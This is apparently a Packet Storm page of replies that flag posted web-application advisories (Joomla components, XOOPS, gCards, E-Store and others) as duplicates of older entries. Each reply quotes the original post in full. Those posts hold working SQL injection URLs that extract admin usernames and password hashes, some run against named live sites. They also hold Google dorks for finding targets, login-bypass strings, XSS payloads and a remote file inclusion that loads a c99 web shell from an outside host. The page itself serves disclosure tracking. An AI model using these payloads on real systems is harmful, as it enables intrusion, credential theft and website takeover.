Re: joomla com_football Components Sql Injection vulnerability
Already discovered in 2008: http://packetstormsecurity.com/0807-exploits/joomlafootball-sql.txt 0da4ecb91d39a48ac8902c7cd277eaa8 The Joomla Football component suffers from a SQL injection vulnerability. Authored By Anonymous On Sun, Jun 30, 2013 at 11:08:51AM +, iedb.t...@gmail.com wrote: The joomla com_football Components suffers from a Sql Injection vulnerability. # #Iranian Exploit DataBase # http://exploit.iedb.ir # # Exploit Title : joomla com_football Components Sql Injection vulnerability # Author : Iranian Exploit DataBase # Discovered By : IeDb # Home : http://exploit.iedb.ir # Software Link : http://www.joomla.org # Security Risk : High # Tested on : Linux # Dork : inurl:index.php?option=com_football # # Exploit : # http://www.Site.com/index.php?option=com_footballtask=viewteamteamID=[Sql] # Dem0 : # http://www.cvhspreps.com/index.php?option=com_footballtask=viewteamteamID=-1+union+select+null,null,3,4,5,6,concat%20%28username,0x3a,password%29,8+from+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72-- # http://www.sv-gruenbach.at/index.php?option=com_footballtask=viewteamteamID=-1+UNION+SELECT+1,2,group_concat%28username,0x3a,password%29,4,5+from+jos_users-- # # Exploit Archive : http://exploit.iedb.ir/exploits-155.html #
Facebook Information Disclosure
Worth Reading: http://packetstormsecurity.com/news/view/22713/Facebook-Where-Your-Friends-Are-Your-Worst-Enemies.html https://www.facebook.com/notes/facebook-security/important-message-from-facebooks-white-hat-program/10151437074840766
Re: SQL injection vulnerability in 360 Web Manager
Already discovered 01/2008. http://packetstormsecurity.org/0801-exploits/360-sql.txt 904cc6b6c4da1afe893909ea684ba118 360 Web Manager version 3.0 suffers from a SQL injection vulnerability. Authored By a href=mailto:innos_got[at]rambler.ru;Ded MustD!e/a On Tue, May 25, 2010 at 07:47:45PM +0200, advis...@htbridge.ch wrote: Vulnerability ID: HTB22379 Reference: http://www.htbridge.ch/advisory/sql_injection_vulnerability_in_360_web_manager_1.html Product: 360 Web Manager Vendor: 360 Web Manager Vulnerable Version: 3.0 Vendor Notification: 10 May 2010 Vulnerability Type: SQL Injection Status: Not Fixed, Vendor Alerted, Awaiting Vendor Response Risk level: Medium Credit: High-Tech Bridge SA (http://www.htbridge.ch/) Vulnerability Details: The vulnerability exists due to failure in the /adm/content/webpages/webpages-form-led-edit.php script to properly sanitize user-supplied input in IDFM variable. Attacker can alter queries to the application SQL database, execute arbitrary queries to the database, compromise the application, access or modify sensitive data, or exploit various vulnerabilities in the underlying SQL database. Attacker can use browser to exploit this vulnerability. The following PoC is available: http://host/adm/content/webpages/webpages-form-led-edit.php?IDFM=-1+ANY_SQL_HERE+--+
Re: phpPollScript - 1.3 Remote File Include
stolen/copied. http://packetstormsecurity.org/0909-exploits/phppollscript-rfi.txt 67daecae41e8707794f089bf6128efd0 phpPollScript versions 1.3 and below suffer from a remote file inclusion vulnerability. Authored By a href=mailto:cr4wl3r[at]linuxmail.org;cr4wl3r/a On Sun, Dec 20, 2009 at 11:43:25AM -, ad...@ekin0x.com wrote: #phpPollScript = 1.3 Remote File Include Vulnerability #Download Script : http://download.tomex.org/phpPollScriptv13b.zip #Author : ZZxxHackerzzXX #Contact : ad...@ekin0x.com #Location : Turkey #file : # init.poll.php # line 2 $inc_path = dirname($include_class); # line 3 require ($inc_path./voting.poll.php); #3xplo!t : #http://target.com/[path]/php/init.poll.php?include_class=http://www.ekin0x.com/c99.txt? #e...@ekin0x.com (all crew shell)
Re: WX Guest Book 1.1.208 (SQL/XSS) Multiple Remote Vulnerabilities
Completely stolen/copied. http://packetstormsecurity.org/0909-exploits/wxguestbook-sqlxss.txt 29598ed23c2831346a48aeb6fbdb3605 WX Guest Book version 1.1.208 suffers from remote SQL injection and cross site scripting vulnerabilities. Authored By a href=mailto:damagicalhacker[at]gmail.com;learn3r/a On Sun, Dec 13, 2009 at 12:45:17PM -, ad...@ekin0x.com wrote: ### # WX Guest Book 1.1.208 Vulns # # By xxHackerXzX hacker from nepal # # ad...@ekin0x.comm # ### Product name: WX Guestbook 1.1.208 Product vendor: http://www.ekin0x.com/r57.txt This product suffers from multiple SQLi and persistent XSS vuln. ## SQL Search Vuln ### The search parameters/queries we submit to the search.php are unsanitized and hence this can be compromised to SQLinject the server. SQL query: $signs = DB_Execute(SELECT * FROM `wxgb_signs` WHERE (`sign` LIKE '% . $QUERY . %') ORDER BY `code` DESC); The $QUERY is what we submit through search box so injecting this will sql inject the server. The following is the sample sql injection example. Sample search string: test%') UNION ALL SELECT 1,2,concat(@@version,0x3a,user(),database()),4,5,6,7,8,9,10,11,12/* ## SQL login bypass ### The username and password fields are unsanitized and hence we can bypass the login systems. Username: admin'))/* Password: learn3r [or whatever] Or Username: ')) or 1=1/* Password: learn3r [or whatever] ## Persistent XSS Vulns ## In the name field (I suppose as I don't understand arabic), you can inject XSS... scriptalert(String.fromCharCode(97));/script scriptlocation.replace(http://www.ekin0x.com;)/script
Re: E-Store SQL Injection Vulnerability
Previously discovered: http://packetstormsecurity.org/0812-exploits/estore-sql.txt 856a5dc9cba52e892cbb54bd2e1a0a82 getaphpsite e-store suffers from a remote SQL injection vulnerability in SearchResults.php. Authored By a href=mailto:trt-turk[at]hotmail.com;ZoRLu/a On Fri, Dec 11, 2009 at 05:50:54AM +0100, Salvatore Fresta aka Drosophila wrote: E-Store SQL Injection Vulnerability Name E-Store Vendorhttp://www.getaphpsite.com AuthorSalvatore Fresta aka Drosophila Website http://www.salvatorefresta.net Contact salvatorefresta [at] gmail [dot] com Date 2009-09-03 X. INDEX I.ABOUT THE APPLICATION II. DESCRIPTION III. ANALYSIS IV. SAMPLE CODE V.FIX VI. DISCLOSURE TIMELINE I. ABOUT THE APPLICATION E-Store is a commercial PHP e-commerce. II. DESCRIPTION This application presents a SQL Injection bug. III. ANALYSIS Summary: A) SQL Injection A) SQL Injection The GET where parameter passed to SearchResults.php has not properly sanitised. Because of the affected query, the Magic Quotes GPC flag (php.in) may be on. IV. SAMPLE CODE http://site/path/SearchResults.php?SearchTerm=where=ItemName UNION ALL SELECT 1,@@version,3,4,5,6,7,8,9,10,11,12,13,14,15,16%23ord1=ItemNameord2=ascsearch1=Go! V. FIX No patch.
Packet Storm is back online.
We had a provider outage but the site is now back online.
Re: [Full-disclosure] Joomla Component com_joomradio SQL Injection
Already discovered in June, 2008. http://packetstormsecurity.org/0806-exploits/joomlajoomradio-sql.txt bc9c589fca40fce9a4f4484333f207b5 The Joomla Joomradio component version 1.0 suffers from a remote SQL injection vulnerability. Authored By a href=mailto:His0k4.hlm[at]gmail.com;His0k4/a On Wed, Feb 18, 2009 at 07:32:02PM +0100, 0o_zeus_o0 wrote: ### # Advisory X # Title: Joomla Component com_joomradio SQL Injection # Author: 0o_zeus_o0 ( Arturo Z. ) # Contact: arturo_zamor...@hotmail.com # Website: www.securitybroken.com # Date: 18/02/09 # Risk: Medium # Vendor Url: http://ajaxportal.eu/ # Affected Software: JoomRadio # autor script:author XrByte i...@exp.ee, Grusha gru...@feellove.eu ## # #Example: ## #htp:// victimurl.com/pathjoomla/index.php?option=com_joomradiopage=show_radioid=-1UNION SELECT user(),concat(username,0x3a,password),user(),user(),user(),user(),user() FROM jos_users-- # ## #greetz: # # original advisorie: http://www.securitybroken.com ## ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: Joomla Component GameQ
Already discovered: http://packetstormsecurity.org/0806-exploits/joomlagameq-sql.txt 6d9a99abd76c7d48c68ea5c98d952844 The Joomla GameQ component versions 4.0 and below suffer from a SQL injection vulnerability. Authored By a href=mailto:His0k4.hlm[at]gmail.com;His0k4/a On Thu, Dec 04, 2008 at 08:20:16AM -0700, [EMAIL PROTECTED] wrote: # Joomla Component GameQ # # # #AUTHOR : Sina Yazdanmehr (R3d.W0rm) # #Discovered by : Sina Yazdanmehr (R3d.W0rm) # #Our Site : Http://IRCRASH.COM # #IRCRASH Team Members : Dr.Crash - R3d.w0rm (Sina Yazdanmehr) - Hadi Kiamarsi # # # # #Download : http://joomlacode.org/gf/project/gameq # # # #DORK : inurl:option=com_gameq # # # # # [Bug] # # # #http://Site/[path]/index.php?option=com_gameqtask=pagecategory_id=-+union+select+0,1,2,3,4,5,username,password,8,9,10,11,12,13+from+jos_users/* # # # # Site : Http://IRCRASH.COM # ## TNX GOD ##
Re: News Manager Remote SQL Injection Vulnerability
Discovered over a year ago. http://packetstormsecurity.org/0705-exploits/prenews-sql.txt 0bae5b1d6f9d99c6749403341807f0d8 Pre News Manager version 1.0 suffers from a remote SQL injection vulnerability. nbsp;Homepage: a href=http://www.cyber-security.org/; target=exthttp://www.cyber-security.org/./a On Thu, Oct 09, 2008 at 12:21:25PM +0300, Ghost hacker wrote: # News Manager Remote SQL Injection Vulnerability # # © Ghost Hacker , Real Hack Back :) # #[~] Author : Ghost Hacker # #[~] Home page : www.Real-h.com [Real Hack Back] # #[~] Contact Me : [EMAIL PROTECTED] # #[~] Bug : SQL Injection # #[~] From : Kingdom Saudi Arabia # #[~] Name Script : News Manager # #[~] Download : http://www.preprojects.com/news.asp # #[~] Dork : # # ©2006 PRE NEWS MANAGER | All Rights Reserved Or inurl:news_detail.php?nid= # #[~] Exploit : # # http:///news_detail.php?nid=-139+UNION+SELECT+1,2,concat(login,0x3a,password),3,5,6,7+from+admin-- #[~] live demo : # # http://www.preproject.com/news manager/news_detail.php?nid=-139+UNION+SELECT+1,2,concat(login,0x3a,password),3,5,6,7+from+admin-- #[~]Greets : # # Mr.SQL , Mr.SaFa7 , Mr-3sheq , aBo3tB , Night Mare , Root Hacker , Dmar al3noOoz , LJ TeaM # # Mr.MN7oS , Mr.Hope , EgYpTiaN x HaCkEr , PrO SpY , v4-team.com # # All Members Real Hack , All My Friends :) # # Viva Real Hack - Real-h.com .. # _ Express yourself instantly with MSN Messenger! Download today it's FREE! http://messenger.msn.click-url.com/go/onm00200471ave/direct/01/
Re: E-Php B2B Trading Marketplace(cid) Remote SQL Injection Vulnerability
Already discovered: http://packetstormsecurity.org/0809-exploits/ephpb2b-sql.txt cceb7b553c51129e88d5553fdcb5129d E-PHP B2B Trading Marketplace Scripts suffers from a remote SQL injection vulnerability in listings.php. nbsp;Homepage: a href=http://www.darkc0de.com/; target=exthttp://www.darkc0de.com/./a Authored By a href=mailto:r45c4l[at]hotmail.com;r45c4l/a On Wed, Sep 10, 2008 at 03:07:37PM +0300, hussin x wrote: |___| | | E-Php B2B Trading Marketplace(cid) Remote SQL Injection Vulnerability | |___ |-Hussin X--| | |Author: Hussin X | |Home : WwW.Hussin-X.CoM http://www.hussin-x.com/ | www.tryag.cc/cc | |email: darkangel_g85[at]Yahoo[DoT]com | | | |___ | | | | script : http://www.ephpscripts.com | |___| Exploit: www.[target].com/Script/listings.php?browse=sellcid=-1+union+select+1,concat(es_username,0x3e,es_password),3,4,5,6,7,8+FROM+ephpb2b_members -- L!VE DEMO: : INFO http://www.ephpscripts.com/demo/b2b/listings.php?browse=sellcid=-1+union+select+1,concat(user(),version(),database()),3,4,5,6,7,8+FROM+ephpb2b_members -- http://www.ephpscripts.com/demo/b2b/listings.php?browse=sellcid=-1+union+select+1,concat(es_username,0x3e,es_password),3,4,5,6,7,8+FROM+ephpb2b_members -- ( Greetz )_ | |All members of the Forum WwW.Hussin-X.CoM http://www.hussin-x.com/ | WwW.TrYaG.CC http://www.tryag.cc/ | | My friends : DeViL iRaQ | IRAQ DiveR | IRAQ_JAGUR | CraCkEr | | Ghost Hacker | FAHD | Iraqihack | jiko | str0ke | mos_chori |__ Im IRAQi |___| | | E-Php B2B Trading Marketplace(cid) Remote SQL Injection Vulnerability | |___ |-Hussin X--| | |Author: Hussin X | |Home : WwW.Hussin-X.CoM | www.tryag.cc/cc | |email: darkangel_g85[at]Yahoo[DoT]com | | | |___ | | | | script : http://www.ephpscripts.com | |___| Exploit: www.[target].com/Script/listings.php?browse=sellcid=-1+union+select+1,concat(es_username,0x3e,es_password),3,4,5,6,7,8+FROM+ephpb2b_members-- L!VE DEMO: : INFO http://www.ephpscripts.com/demo/b2b/listings.php?browse=sellcid=-1+union+select+1,concat(user(),version(),database()),3,4,5,6,7,8+FROM+ephpb2b_members-- http://www.ephpscripts.com/demo/b2b/listings.php?browse=sellcid=-1+union+select+1,concat(es_username,0x3e,es_password),3,4,5,6,7,8+FROM+ephpb2b_members-- ( Greetz )_ | |All members of the Forum WwW.Hussin-X.CoM | WwW.TrYaG.CC | | My friends : DeViL iRaQ | IRAQ DiveR | IRAQ_JAGUR | CraCkEr | | Ghost Hacker | FAHD | Iraqihack | jiko | str0ke | mos_chori |__ Im IRAQi
Re: Remote SQL Injection
Discovered back in May. http://packetstormsecurity.org/0805-exploits/airvaecommerce-sql.txt 8c7afd46a5774569aea14a39556d6bbd AirvaeCommerce version 3.0 suffers from a SQL injection vulnerability. nbsp;Homepage: a href=http://www.root-qtr.com/; target=exthttp://www.root-qtr.com/./a Authored By a href=mailto:qataro[at]hotmail.com;QTRinux/a On Sat, Jun 28, 2008 at 05:33:49PM -, [EMAIL PROTECTED] wrote: Author :: Dr-Linux saidmoftakhar(at)gmx(dot)de Application :: AirvaeCommerce 3.0 Download :: http://www.airvaecommerce.com Dork 1 :: powered by AirvaeCommerce 3.0 [C o n t e x t]- Vulnerability: http://localhost/ path script / ?p=vzhpid= [SQL] Example : /?p=vzhpid=-1%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30 ,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,concat(pwd,0x3a,email),47%20from%20usr%20where%20id=2/* Note : Some site used SELECT statements have a different number of columns about 45 . ---[End of context]
Re: Powered by gCards v1.46 SQL
Discovered May of 07. http://packetstormsecurity.org/0705-exploits/gcards-sql-exec.txt 92ba41159dda3c9c4cb68fea13c310fc gCards versions 1.46 and below SQL injection and remote code execution exploit. nbsp;Homepage: a href=http://www.w4ck1ng.com/; target=exthttp://www.w4ck1ng.com/./a Authored By a href=mailto:silentz[at]w4ck1ng.com;Silentz/a On Fri, Apr 18, 2008 at 09:29:06PM -, [EMAIL PROTECTED] wrote: Powered by gCards v1.46 SQL # # # AUTHOR : TurkishWarriorr # # HOME : http://www.1923turk.org # # # # DORKS 1 : Powered by gCards v1.46 # DORKS 2 : gcards/ # ## EXPLOIT : gcards/getnewsitem.php?newsid=1+union+select+1,2,concat(username,char(45),userpass),4,5+FROM+gc_cardusers-- ## www.1923turk.org [EMAIL PROTECTED]
Re: Powered by Pagetool Ver (1.04-05-06-07)
Discovered in June '07: http://packetstormsecurity.org/0706-exploits/pagetool-sql.txt On Sun, Feb 24, 2008 at 10:00:41AM -, [EMAIL PROTECTED] wrote: Google arama : www.1923turk.org Turkishwariorr Powered by Pagetool Ver 1.04 Powered by Pagetool Ver 1.07 Powered by Pagetool Ver 1.05 Powered by Pagetool Ver 1.06 Site sonuna : index.php?name=pagetool_newsnews_id=-1/**/UNION/**/ALL/**/SELECT/**/CONCAT(username,0x3a,passwd),2,3,4,5/**/FROM/**/pt_core_users/**/WHERE/**/groups/**/LIKE/**/0x2561646D696E25/*
Re: XOOPS Module wflinks SQL Injection(cid)
fyi - duplicate of http://packetstormsecurity.org/0704-exploits/xoopswflinks-sql.txt On Mon, Feb 18, 2008 at 05:19:20PM -, [EMAIL PROTECTED] wrote: ### # #XOOPS Module wflinks SQL Injection(cid) # ### # # AUTHOR : [EMAIL PROTECTED] # # HOME 1 : http://www.milw0rm.com/author/1334 # # MA#304;L : [EMAIL PROTECTED] # # # DORK 1 : allinurl: modules/wflinks/viewcat.php # # DORK 2 : allinurl: modules/wflinks # example http://xx.com/modules/wflinks/viewcat.php?cid= [exploit] EXPLOIT : -88%2F%2A%2A%2Funion%2F%2A%2A%2Fselect/**/char(117,115,101,114,110,97,109,101,58),concat(uname,0x3a,pass)/**/from%2F%2A%2A%2Fxoops_users/*%20where%20admin%20pass%20 # [EMAIL PROTECTED] i AM NOT HACKER [EMAIL PROTECTED]
Re: Vwar New Bug
Basically a dup of http://packetstormsecurity.org/0608-exploits/vwar150multi.txt On Wed, Feb 13, 2008 at 10:50:53AM -, [EMAIL PROTECTED] wrote: Vendor : Www.Vwar.De Credits : Pouya_Server Vuln. Ver : v1.5.0 Http://pouya-server.blogfa.com [EMAIL PROTECTED] --- http://[host]/vwar/war.php?s=[SQL] http://[host]/vwar/war.php?page=[SQL] http://[host]/vwar/war.php?showgame=[SQL] http://[host]/vwar/war.php?sortby=[SQL]
Re: Joomla multiple vulerabilities (1.0.X = )
This exact mail was also sent out in july.. http://packetstormsecurity.org/0707-exploits/joomla-sql.txt On Wed, Sep 26, 2007 at 07:09:17PM -, [EMAIL PROTECTED] wrote: Hello Joomla multiple vulerabilities Discovered By : HACKERS PAL Copy rights : HACKERS PAL Website : http://www.soqor.net Email Address : security (at) soqor (dot) net Affected Versions 1.0.X - tested on 1.0.12 and 1.5 maybe affected - not tested but probebly affected sql injection administrator/popups/pollwindow.php?pollid=1%20union%20select%20password %20from%20jos_users/* Full path Many many in includes/ Examples includes/Cache/Lite/Output.php includes/patTemplate/patTemplate/Stat.php includes/patTemplate/patTemplate/OutputFilter.php includes/patTemplate/patTemplate/OutputCache.php includes/patTemplate/patTemplate/Modifier.php includes/patTemplate/patTemplate/Reader.php includes/patTemplate/patTemplate/TemplateCache.php .. ETC GrEEtZ : DeviL-00 , Dr.ExE , GaCkeR , Sp1deR_Net , Black AttaCk , MiniMan , JareeH BaghdaD , Le Copra; Special GrEEtZ For : MohAjali AnD SoQoR.NeT TeaM AnD MemberS; End of it :) WwW.SoQoR.NeT
Re: GPhotos 1.5 Multiple vulnerabilities
This directory traversal has already been discovered. http://packetstormsecurity.org/0605-exploits/gphotos.txt f4e2552282a5007bb84e7693bc78dac2 GPhotos versions 1.5 and below suffer from directory traversal and cross site scripting flaws. Authored By Moroccan Security On Sat, Nov 18, 2006 at 09:19:01PM -, [EMAIL PROTECTED] wrote: 18/11/06 # Produit Vuln?rable : GPhotos 1.5 # Site officiel du produit : http://photopeyu.free.fr/ #Vuln?rabilitiezz : 1] Multiple Full path disclosure : http://localhost/photos/index.php?rep=tux25 2]Directory traversal : http://localhost/photos/index.php?rep=../ ~Tux25 - tux025_gmail_point_com :)